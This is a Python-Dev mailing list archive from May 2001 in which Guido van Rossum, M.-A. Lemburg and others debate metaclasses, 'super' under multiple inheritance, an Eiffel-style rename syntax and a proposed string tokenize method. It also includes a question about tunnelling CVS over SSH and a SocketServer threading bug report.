From guido at digicool.com  Thu May  3 16:26:22 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 09:26:22 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Thu, 03 May 2001 09:49:37 +0200."
             <3AF10D91.802C8555@lemburg.com> 
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>  
            <3AF10D91.802C8555@lemburg.com> 
Message-ID: <200105031426.JAA07372@cj20424-a.reston1.va.home.com>

> We are actually trying to turn classes into types here :-)

Yes!  Wait till you see my next batch of checkins. :-)

> Really, I think that we could resolve this issue by not inheriting
> from meta-classes. DictType is a creation of the meta-class
> TypeType. I'm not calling these instances to prevent additional
> confusion. The root of the problem is that for some reason there
> is belief that DictType should implicitly inherit attributes and 
> methods from TypeType. If we simply say that there is no implicit
> inheritance (only explicit one), then these problems should go
> away.

Sorry, you still seem to be confused about this.  As I tried to
explain before, DictType does not *inherit* from TypeType, but it is
an *instance* of TypeType.  TypeType defines a __repr__() method for
all its instances.  This is needed so that repr(DictType) returns
"<type 'DictType'>".  It is *not* inherited from TypeType!

If DictType were to inherit from something, it would inherit from the
(not yet existing) ObjectType.  ObjectType would have a __repr__
method too: it returns "<foo object at 0x......>".

But this method is overridden by DictType, so doesn't come into play.

Requiring explicit inheritance (whatever that may be) won't fix the
problem.

> Some of these ideas are burried in the "super" part of this 
> thread. Unfortunately this concept doesn't go very far since
> Python has multiple inheritance and thus the term "super"
> (referring to the class' single base class) is not well-defined.

Not true.  While super can't always refer to a single class, the use
of super can be completely well-defined in an unambiguous way.  Given

  class D(A, B, C):
    def foo(self):
      super.foo(self)

"super.foo" is whatever would be called in D1 if we changed the class
hierarchy as follows:

  class D1(A, B, C): pass
  class D(D1):
    def foo(self):
      D1.foo(self)

The problem with super is not that it isn't well-defined.  Its problem
is that it's not enough to do what you want.  In some situations
involving multiple inheritance, it can be essential to be able to
"merge" methods of the sane name defined in each of the base classes,
e.g.

  class C(A, B):
    def save(self):
      A.save(self)
      B.save(self)

So we can't use super as an argument to abandon explicitly naming the
base class of base methods.  Out of the proposed spellings that I can
remember:

      B.save(self)			# current Python
      B.__dict__['save'](self)		# ditto, butt ugly
      B::save(self)			# C++
      B._.save(self)			# Don Beaudry
      B.instanceMethods.save(self)	# ???

I still like current Python best!

> As Jim mentioned in his reply to Thomas' question, SmallTalk
> has two parallel hierarchies. One for the classes and one for
> the meta-classes. If we follow the same path in Python and
> keep the two well separated, I think we can resolve many of
> the issues which are currently showing up.

Yeah, but this is not the path that Python has already taken (and
which has been beaten further by Jim Fulton's ExtensionClasses).
Python's path is "turtles all the way down".  See also my old
head-exploding metaclasses paper.

> To link the two hierarchies together we don't need a "super"
> concept, but instead a way to reach the meta-class in charge
> of a class, say "klass.__creator__". 

Your confusion between the "isInstanceOf" and "isInheritedFrom"
relationships seems really deep!  Super relates to inheritance.
Metaclasses relate to instantiation (of the class, as an instance of
the metaclass).

> Note that there's another issue hiding in all this and again
> this is due to multiple inheritance: which meta-class is in
> charge of a class which is derived from two classes having
> different meta-classes ?
> 
> meta1            -->         o klass1
>                                o klass1a
>                                o klass1b
> meta2            -->         o klass2
>                                o klass2a
>                                o klass2b
> 
> class klass3(klass1a, klass2b):
>       ...                  
> 
> I think there's no clean way to resolve this, so I'd suggest
> to simply rule this out and declare it illegal (class can
> only be based on classes having the same meta-class).

Unfortunately, again thanks to Jim Fulton, we can't rule this out,
because this is actually used by ExtensionClasses.  The rule (as I
interpret it) gives the first base class control; if the first base
class is a standard class, it looks if any of the other base classes
are not standard classes, and if so, gives control to the first such
base class.  Another way to say this is that the first base class that
has a non-standard metaclass gets control.

(ExtensionClasses implements an additional rule where it requires all
except one of the base classes to define no instance variables.  This
is an example of the importance of metaclasses done right: the
metaclass has control over such issues.  I don't think that
Smalltalk's metaclasses have this much control -- you pretty much have
a 1-1 correspondence between class and metaclass.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May  3 16:28:03 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 09:28:03 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Thu, 03 May 2001 15:27:34 +1200."
             <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> 
References: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> 
Message-ID: <200105031428.JAA07405@cj20424-a.reston1.va.home.com>

> Guido:
> 
> > Actually, I think that what's in the __dict__ is just perfect
> 
> I was thinking of backwards compatibility for people who
> are hacking the __dict__ of a class directly.

Depending on how they hack it, it may still work.

> If you don't care about that, the problem is simpler.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Thu May  3 16:26:51 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 3 May 2001 09:26:51 -0500
Subject: [Python-Dev] OT: CVS access through firewall via SSH
Message-ID: <15089.27307.136251.862692@beluga.mojam.com>

Python-dev folks,

Sorry for the off-topic post, but I'm striking out on the various other
sources I've located so far.  Since this group seemed to have a love-hate
relationship with CVS for awhile I thought maybe someone here would be able
to steer me in the right direction.

I have to access a CVS repository through a firewall via SSH.  That is, to
get to "server" I have to tunnel through "firewall" using SSH to port "nnn".
Using SSH to establish an interactive session to server is no problem:

    ssh -p nnn firewall

When I'm inside the firewall, I use a CVSROOT that looks like

    :pserver:montanaro at server:/cvs/projects

I need to merge the two bits somehow to come up with a CVSROOT that will do
the tunnel automagically.  I've tried this:

    :pserver:montanaro at firewall:nnn/cvs/projects

but CVS complains

    cvs [update aborted]: connect to firewall:2401 failed: Connection refused

(port 2401 is the normal CVS port).

Any suggestions or pointers?

Thanks,

Skip


From mal at lemburg.com  Thu May  3 18:08:30 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 18:08:30 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>  
	            <3AF10D91.802C8555@lemburg.com> <200105031426.JAA07372@cj20424-a.reston1.va.home.com>
Message-ID: <3AF1827E.E730F5DE@lemburg.com>

Guido van Rossum wrote:
> 
> > We are actually trying to turn classes into types here :-)
> 
> Yes!  Wait till you see my next batch of checkins. :-)

Looking forward to them :) 

BTW, can you give a good starting point into all this (code wise
and concept wise) ? I'd like to play around these new concepts
a litte to get a beeter feeling for the possible issues (I should
have done the same for the coercion stuff a year ago: implementing
mxNumber I now find that some important hooks are missing :-().
 
> > Really, I think that we could resolve this issue by not inheriting
> > from meta-classes. DictType is a creation of the meta-class
> > TypeType. I'm not calling these instances to prevent additional
> > confusion. The root of the problem is that for some reason there
> > is belief that DictType should implicitly inherit attributes and
> > methods from TypeType. If we simply say that there is no implicit
> > inheritance (only explicit one), then these problems should go
> > away.
> 
> Sorry, you still seem to be confused about this. 

I think it has to do with terminology: when I say "inherit"
I actually mean "the lookup is forwarded to the another object".

In that sense, instances inherit from their classes and 
classes from their base-classes:

meta-class M ->        o base-class A
                         o class B
                           o instance x = B()  

Meta-class M control this "inheritance scheme" and can modify
it depending on its needs. 

Here's a scenario of what I have in mind:

In the above picture, say A defines an attribute A.a which is not 
defined in B or as instance attribute of B(). Querying x.a would then 
launch this process:

1. x.a -> fails
2. M.__findattr__(x, 'a') is called to find and return the
   attribute
3. M.__findattr__ asks B for an attribute 'a' -> fails
4.    -- " --     asks A       -- " --        -> success
5.    -- " --     returns the found attribute

I know that this is somewhat different under the covers than
what's happening now, but the Python programmer will not notice
this. It most probably does not work well with the Don Beaudry
hook though... so maybe I'm simply on the wrong track here.

> As I tried to
> explain before, DictType does not *inherit* from TypeType, but it is
> an *instance* of TypeType.  TypeType defines a __repr__() method for
> all its instances.  This is needed so that repr(DictType) returns
> "<type 'DictType'>".  It is *not* inherited from TypeType!
> 
> If DictType were to inherit from something, it would inherit from the
> (not yet existing) ObjectType.  ObjectType would have a __repr__
> method too: it returns "<foo object at 0x......>".
> 
> But this method is overridden by DictType, so doesn't come into play.
> 
> Requiring explicit inheritance (whatever that may be) won't fix the
> problem.

With "explicit inheritance" I meant that the programmer has to
take care of passing the lookup on to the meta-class, rather
than applying some magic which hooks together class and meta-
class.
 
> > Some of these ideas are burried in the "super" part of this
> > thread. Unfortunately this concept doesn't go very far since
> > Python has multiple inheritance and thus the term "super"
> > (referring to the class' single base class) is not well-defined.
> 
> Not true.  While super can't always refer to a single class, the use
> of super can be completely well-defined in an unambiguous way.  Given
> 
>   class D(A, B, C):
>     def foo(self):
>       super.foo(self)
> 
> "super.foo" is whatever would be called in D1 if we changed the class
> hierarchy as follows:
> 
>   class D1(A, B, C): pass
>   class D(D1):
>     def foo(self):
>       D1.foo(self)

Nice trick -- much like the "+0" trick in math ;-)

> The problem with super is not that it isn't well-defined.  Its problem
> is that it's not enough to do what you want.  In some situations
> involving multiple inheritance, it can be essential to be able to
> "merge" methods of the sane name defined in each of the base classes,
> e.g.
> 
>   class C(A, B):
>     def save(self):
>       A.save(self)
>       B.save(self)
> 
> So we can't use super as an argument to abandon explicitly naming the
> base class of base methods.  Out of the proposed spellings that I can
> remember:
> 
>       B.save(self)                      # current Python
>       B.__dict__['save'](self)          # ditto, butt ugly
>       B::save(self)                     # C++
>       B._.save(self)                    # Don Beaudry
>       B.instanceMethods.save(self)      # ???
> 
> I still like current Python best!

But it doesn't help us in the very common case of mixin classes
since there the method and sometimes even not the programmer
will know where the basemethod to call lives. This is why I
wrote the basemethod() helper: it looks up the right method
at run-time and thus allows writing mixin-classes which override
methods of other classes which are only known to the programmer
using the mixin and not necessarily to the one writing the mixin.
 
> > As Jim mentioned in his reply to Thomas' question, SmallTalk
> > has two parallel hierarchies. One for the classes and one for
> > the meta-classes. If we follow the same path in Python and
> > keep the two well separated, I think we can resolve many of
> > the issues which are currently showing up.
> 
> Yeah, but this is not the path that Python has already taken (and
> which has been beaten further by Jim Fulton's ExtensionClasses).
> Python's path is "turtles all the way down".  See also my old
> head-exploding metaclasses paper.

I know... I was under the impression, though, that a little
breakage under the covers is allowed when moving from type/classes
to all types.
 
> > To link the two hierarchies together we don't need a "super"
> > concept, but instead a way to reach the meta-class in charge
> > of a class, say "klass.__creator__".
> 
> Your confusion between the "isInstanceOf" and "isInheritedFrom"
> relationships seems really deep!  Super relates to inheritance.
> Metaclasses relate to instantiation (of the class, as an instance of
> the metaclass).

See above... I don't like implicitely binding creation of objects
with lookup paths. These two concepts don't belong together, IMHO,
since they introduce restrictions which are not really necessary.
(I have made some great experience with loosly coupled object
systems and don't want to miss their flexibility anymore.)

> > Note that there's another issue hiding in all this and again
> > this is due to multiple inheritance: which meta-class is in
> > charge of a class which is derived from two classes having
> > different meta-classes ?
> >
> > meta1            -->         o klass1
> >                                o klass1a
> >                                o klass1b
> > meta2            -->         o klass2
> >                                o klass2a
> >                                o klass2b
> >
> > class klass3(klass1a, klass2b):
> >       ...
> >
> > I think there's no clean way to resolve this, so I'd suggest
> > to simply rule this out and declare it illegal (class can
> > only be based on classes having the same meta-class).
> 
> Unfortunately, again thanks to Jim Fulton, we can't rule this out,
> because this is actually used by ExtensionClasses.  The rule (as I
> interpret it) gives the first base class control; if the first base
> class is a standard class, it looks if any of the other base classes
> are not standard classes, and if so, gives control to the first such
> base class.  Another way to say this is that the first base class that
> has a non-standard metaclass gets control.

Ouch. Still, since Jim's in control of ExtensionClass -- wouldn't
it be possible to adapt ExtensionClass to an altered scheme ?

> (ExtensionClasses implements an additional rule where it requires all
> except one of the base classes to define no instance variables.  This
> is an example of the importance of metaclasses done right: the
> metaclass has control over such issues.  I don't think that
> Smalltalk's metaclasses have this much control -- you pretty much have
> a 1-1 correspondence between class and metaclass.

Right: more power to the meta-class :-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From paul at pfdubois.com  Thu May  3 18:24:40 2001
From: paul at pfdubois.com (Paul F. Dubois)
Date: Thu, 3 May 2001 09:24:40 -0700
Subject: [Python-Dev] Multiple inheritance
Message-ID: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>

Pardon if this is brief and suggestive only, I am on deadlines.

Super is a mistaken concept in multiple inheritance languages. Fortunately,
Python is not brain-damaged. Its multiple inheritance model can be fixed
easily to be fully capable.

Here is a suggestive example of implementing the Eiffel model (the only one
that is theoretically sound) using "pretend" Python syntax (keyword
conservationists might like "import" where I have "rename"):


1. The simple case, X inherits from Y and in defining foo and bar needs to
use Y's version:

class X (Y rename foo as _sfoo,
                  bar as _sbar
        ):
    def foo (self):
        self._sfoo()
        myfoostuff

Suppose D inherits from B and C, which both inherit from A.
A has a method a1 that is redefined in B but not in C.
D wishes to use both A's version as inherited via C and B's version.

class D (B rename a1 as ba1, C rename a1 as ca1):

     can now use self.ca1, self.a1

Renaming is also useful where you inherit from a utility class and the lingo
is different in the class where you want to use it. E.g. class Window (Tree
rename children as subWindows)

Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition.


From donb at abinitio.com  Thu May  3 18:47:29 2001
From: donb at abinitio.com (Donald Beaudry)
Date: Thu, 03 May 2001 12:47:29 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk 
References: <LNBBLJKPBEHFEDALKOLCMEPNJPAA.tim.one@home.com>
Message-ID: <200105031647.MAA25803@localhost.localdomain>

"Tim Peters" <tim.one at home.com> wrote,
> Given that we're using Python's search rules, the ambiguous point remaining
> is whether:
> 
>     super.f()
> 
> textually contained in a method of class K begins searching with:
> 
>     1) K.__bases__
> 
> or with:
> 
>     2) self.__class__.__bases__

It can only be 1.  The using 2 will only be correct if you are in a
method defined on a leaf class.  If not in a leaf, the search will
find the method you are already in... recursion is likely to terminate
in a stack overflow ;)

--
Donald Beaudry                                     Ab Initio Software Corp.
                                                   201 Spring Street
donb at init.com                                      Lexington, MA 02421
                  ...So much code, so little time...


From guido at digicool.com  Thu May  3 20:48:19 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 14:48:19 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT."
             <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> 
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> 
Message-ID: <200105031848.f43ImKg14308@odiug.digicool.com>


From guido at digicool.com  Thu May  3 20:50:30 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 14:50:30 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Thu, 03 May 2001 09:24:40 PDT."
             <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> 
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> 
Message-ID: <200105031850.f43IoVf14328@odiug.digicool.com>

> Pardon if this is brief and suggestive only, I am on deadlines.

No problem.  We appreciate it!

> Super is a mistaken concept in multiple inheritance languages. Fortunately,
> Python is not brain-damaged. Its multiple inheritance model can be fixed
> easily to be fully capable.
> 
> Here is a suggestive example of implementing the Eiffel model (the only one
> that is theoretically sound) using "pretend" Python syntax (keyword
> conservationists might like "import" where I have "rename"):
> 
> 
> 1. The simple case, X inherits from Y and in defining foo and bar needs to
> use Y's version:
> 
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):
>     def foo (self):
>         self._sfoo()
>         myfoostuff

Nice!  This is similar to Jeremy's favorite way of spelling "super":

class X(Y):
    Yfoo = Y.foo
    def foo(self):
        self.Yfoo()
        myfoostuff

> Suppose D inherits from B and C, which both inherit from A.
> A has a method a1 that is redefined in B but not in C.
> D wishes to use both A's version as inherited via C and B's version.
> 
> class D (B rename a1 as ba1, C rename a1 as ca1):
> 
>      can now use self.ca1, self.a1
> 
> Renaming is also useful where you inherit from a utility class and the lingo
> is different in the class where you want to use it. E.g. class Window (Tree
> rename children as subWindows)
> 
> Reference: Meyer, B. "Object-Oriented Software Construction", 2nd Edition.

Yes.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jepler at inetnebr.com  Thu May  3 20:17:16 2001
From: jepler at inetnebr.com (Jeff Epler)
Date: Thu, 3 May 2001 13:17:16 -0500
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
Message-ID: <20010503131714.D21814@inetnebr.com>

On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):

Why not let us spell this as:
	class X(Y):
		from Y import foo as _sfoo, bar as _sbar
		...

Of course, then you can spell inheritance as
	class X:
		from Y import *
Right?  :)

Jeff


From nas at python.ca  Thu May  3 21:05:37 2001
From: nas at python.ca (Neil Schemenauer)
Date: Thu, 3 May 2001 12:05:37 -0700
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <20010503131714.D21814@inetnebr.com>; from jepler@inetnebr.com on Thu, May 03, 2001 at 01:17:16PM -0500
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> <20010503131714.D21814@inetnebr.com>
Message-ID: <20010503120537.A13708@glacier.fnational.com>

Jeff Epler wrote:
> On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> > class X (Y rename foo as _sfoo,
> >                   bar as _sbar
> >         ):
> 
> Why not let us spell this as:
> 	class X(Y):
> 		from Y import foo as _sfoo, bar as _sbar
> 		...

This already has a meaning in Python.  Paul's suggested syntax is
pretty neat, IMHO.

  Neil


From trentm at ActiveState.com  Thu May  3 21:39:27 2001
From: trentm at ActiveState.com (Trent Mick)
Date: Thu, 3 May 2001 12:39:27 -0700
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <20010503120537.A13708@glacier.fnational.com>; from nas@python.ca on Thu, May 03, 2001 at 12:05:37PM -0700
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com> <20010503131714.D21814@inetnebr.com> <20010503120537.A13708@glacier.fnational.com>
Message-ID: <20010503123927.B30837@ActiveState.com>

On Thu, May 03, 2001 at 12:05:37PM -0700, Neil Schemenauer wrote:
> Jeff Epler wrote:
> > On Thu, May 03, 2001 at 09:24:40AM -0700, Paul F. Dubois wrote:
> > > class X (Y rename foo as _sfoo,
> > >                   bar as _sbar
> > >         ):
> > 
> > Why not let us spell this as:
> > 	class X(Y):
> > 		from Y import foo as _sfoo, bar as _sbar
> > 		...
> 
> This already has a meaning in Python.  Paul's suggested syntax is
> pretty neat, IMHO.

Ditto but how to you separate the "rename" lists for multiple inheritance?

    class X (Y rename foo as _sfoo, bar as _sbar; Z):
        pass
                                                ^---- what to use here

How about:

    class X(Y, Z):
        from Y inherit foo as _yfoo, bar as _ybar
        from Z inherit foo as _zfoo, bar as _zbar


Hmmmmm. Don't know if I like that either. Just throwing out ideas.

Trent

-- 
Trent Mick
TrentM at ActiveState.com


From greg at cosc.canterbury.ac.nz  Fri May  4 06:25:08 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 04 May 2001 16:25:08 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AF1827E.E730F5DE@lemburg.com>
Message-ID: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal at lemburg.com>:

> I think it has to do with terminology: when I say "inherit"
> I actually mean "the lookup is forwarded to the another object".

Some OO languages munge together the instance and inheritance
relationships, but Python isn't one of them. Using terminology
that way in the context of Python is guaranteed to cause
massive confusion!

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Fri May  4 06:58:20 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 04 May 2001 16:58:20 +1200 (NZST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <m14vCbn-000D2zC@artcom0.artcom-gmbh.de>
Message-ID: <200105040458.QAA16653@s454.cosc.canterbury.ac.nz>

pf at artcom-gmbh.de (Peter Funk):

> * People will confuse this with calling
> MyBaseClass.__getitem__(....)

Given type/class/instance unification, that's exactly how it'll
be implemented. So it's not confusion, it's insightful understanding!

> This '::' operator is not at all that ugly

Well, that's a matter of opinion. But I'll concede that it's
less ugly than something like @ or $.

But in any case, it's not going to mean quite the same thing
in Python as it does in C++, so it might just confuse C++
people.

What exactly *is* it going to mean in Python, anyway?
Will it have a corresponding __magic__ method, and if so,
what will it be called?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From mal at lemburg.com  Fri May  4 10:40:17 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 10:40:17 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105040425.QAA16645@s454.cosc.canterbury.ac.nz>
Message-ID: <3AF26AF1.780462E2@lemburg.com>

Greg Ewing wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com>:
> 
> > I think it has to do with terminology: when I say "inherit"
> > I actually mean "the lookup is forwarded to the another object".
> 
> Some OO languages munge together the instance and inheritance
> relationships, but Python isn't one of them. Using terminology
> that way in the context of Python is guaranteed to cause
> massive confusion!

But that's exactly what I am trying to do here: separate the
notion of how lookups work (inheritance) from how objects are 
created (instantiation) !

In Python instantiation binds the new object to the creating
class and all failing lookups are directed from the object to
the class. 

OTOH, the class - base-class lookup relationship 
doesn't have anything to do creation of objects -- classes
are simply bound to their base-classes per definition of the
class in the sense that failing lookups are directed to the
base-classes.

Classes themselves are created by meta-classes. The lookup
strategy between the two is defined by the meta-class.

What I'm argueing for is that meta-classes should get complete
control over how lookups and object creation are done. However,
this will only be possible by breaking the current automatic
lookup scheme at the meta-class - class boundary since otherwise
you'd run into endless loops during lookups (e.g. for many of
the __xxx__ methods).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Fri May  4 11:04:08 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 11:04:08 +0200
Subject: [Python-Dev] "".tokenize() ?
Message-ID: <3AF27088.DE495210@lemburg.com>

Gustavo Niemeyer submitted a patch which adds a tokenize like
method to strings and Unicode:

"one, two and three".tokenize([",", "and"])
-> ["one", " two ", "three"]

I like this method -- should I review the code and then check it in ?

PS: Haven't gotten any response regarding the .decode() method yet...
should I take this as "no objections" ?

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at pythonware.com  Fri May  4 11:57:19 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Fri, 4 May 2001 11:57:19 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <3AF27088.DE495210@lemburg.com>
Message-ID: <017301c0d480$9d445f20$0900a8c0@spiff>

mal wrote:


> Gustavo Niemeyer submitted a patch which adds a tokenize like
> method to strings and Unicode:
>
> "one, two and three".tokenize([",", "and"])
> -> ["one", " two ", "three"]
>
> I like this method -- should I review the code and then check it in ?

-1.  method bloat.  not exactly something you do every day, and
when you do, it's a one-liner:

def tokenize(string, ignore):
    [word for word in re.findall("\w+", string) if not word in ignore]

> PS: Haven't gotten any response regarding the .decode() method yet...
> should I take this as "no objections" ?

-0.  method bloat.  we don't have asfloat methods on integers and
asint methods on strings either...

Cheers /F


From mal at lemburg.com  Fri May  4 12:16:16 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 04 May 2001 12:16:16 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff>
Message-ID: <3AF28170.399C2A5@lemburg.com>

Fredrik Lundh wrote:
> 
> mal wrote:
> 
> > Gustavo Niemeyer submitted a patch which adds a tokenize like
> > method to strings and Unicode:
> >
> > "one, two and three".tokenize([",", "and"])
> > -> ["one", " two ", "three"]
> >
> > I like this method -- should I review the code and then check it in ?
> 
> -1.  method bloat.  not exactly something you do every day, and
> when you do, it's a one-liner:
> 
> def tokenize(string, ignore):
>     [word for word in re.findall("\w+", string) if not word in ignore]

This is not the same as what .tokenize() does: it cut at each
occurrance of a substring rather than words as in your example
(although I must say that list comprehension looks cool ;-).
 
> > PS: Haven't gotten any response regarding the .decode() method yet...
> > should I take this as "no objections" ?
> 
> -0.  method bloat.  we don't have asfloat methods on integers and
> asint methods on strings either...

Well, we already have .encode() which interfaces to PyString_Encode(),
but no Python API for getting at PyString_Decode(). This is what
.decode() is for. Depending on the codecs you use, these two
methods can be very useful, e.g. for "fixing" line-endings or
hexifying strings. The codec concept can be used for far more
applications than just converting from and to Unicode.

About rich method APIs in general: I like having rich method APIs,
since they make life easier (you don't have to reinvent the wheel 
everytime you want a common job to be done). IMHO, too many
methods can never hurt, but I'm probably alone with that POV.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at pythonware.com  Fri May  4 12:50:06 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Fri, 4 May 2001 12:50:06 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <3AF27088.DE495210@lemburg.com> <017301c0d480$9d445f20$0900a8c0@spiff> <3AF28170.399C2A5@lemburg.com>
Message-ID: <01c801c0d487$fb94f290$0900a8c0@spiff>

mal wrote:

> > > "one, two and three".tokenize([",", "and"])
> > > -> ["one", " two ", "three"]
> > >
> > > I like this method -- should I review the code and then check it in ?
> >
> > -1.  method bloat.  not exactly something you do every day, and
> > when you do, it's a one-liner:
> >
> > def tokenize(string, ignore):
> >     [word for word in re.findall("\w+", string) if not word in ignore]
>
> This is not the same as what .tokenize() does: it cut at each
> occurrance of a substring rather than words as in your example

oh, I didn't see the spaces.  splitting on all substrings is even
easier (but perhaps a bit more obscure, at least when written
on one line):

def tokenize(string, seps):
    return re.split("|".join(map(re.escape, seps)), string)

Cheers /F


From lkcl at samba-tng.org  Fri May  4 13:31:29 2001
From: lkcl at samba-tng.org (Luke Kenneth Casson Leighton)
Date: Fri, 4 May 2001 13:31:29 +0200
Subject: [Python-Dev] [noreply@sourceforge.net: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn]
Message-ID: <20010504133129.K26116@angua.rince.de>

hi there,

i thought it best to bring this to someone's attention.

the forkingmixin code keeps track of its children, plus
because it forks, there's no close_requests() to interfere
with the operation of the child etc. etc.

now, for some marginally bizarre reason, adding an
extra base class - BaseServer - has, i believe (without
proof, just a hunch), caused a bug in ThreadingMixIn to be
more likely to occur.

now, i wrote BaseServer in order to be able to overload
this for a server that reads from a SQL server table
and performs actions based on what it reads from there
(the name of a host and the name of a python script to
action on the host, from the database :) :)

... but i don't do threading.  python is my first
actual exposure to thread programming.  does anyone
have enough experience with threads to write something
in less lines and less time than this message?

all best,

luke

----- Forwarded message from noreply at sourceforge.net -----

Delivered-To: lkcl at angua.rince.de
Delivered-To: lkcl at samba.org
To: noreply at sourceforge.net
From: noreply at sourceforge.net
Subject: [ python-Bugs-417845 ] Python 2.1: SocketServer.ThreadingMixIn
Date: Thu, 03 May 2001 16:26:12 -0700

Bugs item #417845, was updated on 2001-04-21 08:28
You can respond by visiting: 
http://sourceforge.net/tracker/?func=detail&atid=105470&aid=417845&group_id=5470

Category: Python Library
Group: None
Status: Open
Resolution: None
Priority: 5
Submitted By: Nobody/Anonymous (nobody)
Assigned to: Guido van Rossum (gvanrossum)
Summary: Python 2.1: SocketServer.ThreadingMixIn

Initial Comment:
SocketServer.ThreadingMixIn does not work properly
since it tries to close the socket of a request two
times.


From gward at python.net  Fri May  4 20:12:44 2001
From: gward at python.net (Greg Ward)
Date: Fri, 4 May 2001 14:12:44 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>; from paul@pfdubois.com on Thu, May 03, 2001 at 09:24:40AM -0700
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
Message-ID: <20010504141244.A1167@gerg.ca>

On 03 May 2001, Paul F. Dubois said:
> 1. The simple case, X inherits from Y and in defining foo and bar needs to
> use Y's version:
> 
> class X (Y rename foo as _sfoo,
>                   bar as _sbar
>         ):

Maybe I'm being thick, but don't you get the same effect by doing this:

class X (Y):
    _sfoo = Y.foo
    _sbar = Y.bar

...or would the "rename" syntax also hide the "foo" and "bar" names from
X's effective namespace[1]?  In that case, I guess some special syntax
is needed.

[1] "effective namespace" -- the union of X's class dict with all its
superclass' dicts; not actually X's namespace, but the set of names you
can use in X.  I think.  Err, whatever.

        Greg


From gward at python.net  Fri May  4 20:15:51 2001
From: gward at python.net (Greg Ward)
Date: Fri, 4 May 2001 14:15:51 -0400
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: <3AF27088.DE495210@lemburg.com>; from mal@lemburg.com on Fri, May 04, 2001 at 11:04:08AM +0200
References: <3AF27088.DE495210@lemburg.com>
